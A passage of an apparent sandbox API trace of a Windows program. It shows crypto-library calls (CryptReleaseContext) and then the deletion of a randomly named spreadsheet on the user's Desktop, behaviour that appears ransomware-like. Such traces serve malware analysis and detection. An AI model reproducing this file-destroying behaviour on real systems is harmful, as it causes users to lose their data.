0x2e78a50 [0213.709] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0213.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0213.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0213.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0213.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0213.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0213.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0213.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0213.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0213.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0213.710] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0213.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.710] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0213.711] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0213.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0213.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0213.711] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0213.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0213.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0213.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0213.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0213.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0213.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0213.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0213.711] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0213.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0213.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0213.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0213.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0213.712] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0213.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0213.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0213.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0213.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0213.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0213.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0213.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0213.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0213.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0213.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0213.713] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0213.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0213.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0213.713] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0213.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0213.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0213.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0213.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0213.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0213.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0213.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0213.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0213.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0213.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0213.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0213.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0213.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0213.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0213.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0213.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0213.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0213.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0213.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0213.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0213.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0213.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0213.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0213.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0213.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0213.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0213.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0213.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0213.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0213.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0213.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0213.716] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0213.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0213.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0213.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0213.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0213.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0213.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0213.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0213.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0213.716] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0213.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0213.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0213.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0213.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0213.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0213.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0213.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0213.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0213.718] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0213.718] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0213.718] FreeLibrary (hLibModule=0x756e0000) returned 1 [0213.718] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.718] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.718] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.718] CloseHandle (hObject=0x2a0) returned 1 [0213.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.720] CloseHandle (hObject=0x2d0) returned 1 [0213.852] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.853] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.854] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0213.854] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/xwkMqwHw2FNJUh0.ods", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\xwkMqwHw2FNJUh0.ods", lpFilePart=0x8cedf4*="xwkMqwHw2FNJUh0.ods") returned 0x2b [0213.855] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xwkMqwHw2FNJUh0.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\xwkmqwhw2fnjuh0.ods")) returned 0x20 [0213.855] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xwkMqwHw2FNJUh0.ods", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e0a13e0, ftCreationTime.dwHighDateTime=0x1d5ead3, ftLastAccessTime.dwLowDateTime=0x7c8450b0, ftLastAccessTime.dwHighDateTime=0x1d5edd9, ftLastWriteTime.dwLowDateTime=0x7c8450b0, ftLastWriteTime.dwHighDateTime=0x1d5edd9, nFileSizeHigh=0x0, nFileSizeLow=0x1893, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="xwkMqwHw2FNJUh0.ods", cAlternateFileName="XWKMQW~1.ODS")) returned 0xa87250 [0213.855] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xwkMqwHw2FNJUh0.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\xwkmqwhw2fnjuh0.ods")) returned 1 [0213.900] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e0a13e0, ftCreationTime.dwHighDateTime=0x1d5ead3, ftLastAccessTime.dwLowDateTime=0x7c8450b0, ftLastAccessTime.dwHighDateTime=0x1d5edd9, ftLastWriteTime.dwLowDateTime=0x7c8450b0, ftLastWriteTime.dwHighDateTime=0x1d5edd9, nFileSizeHigh=0x0, nFileSizeLow=0x1893, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="xwkMqwHw2FNJUh0.ods", cAlternateFileName="XWKMQW~1.ODS")) returned 0 [0213.900] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0213.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0213.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0213.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0213.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0213.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0213.901] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0213.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0213.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0213.901] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0213.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0213.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0213.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0213.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0213.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0213.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0213.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 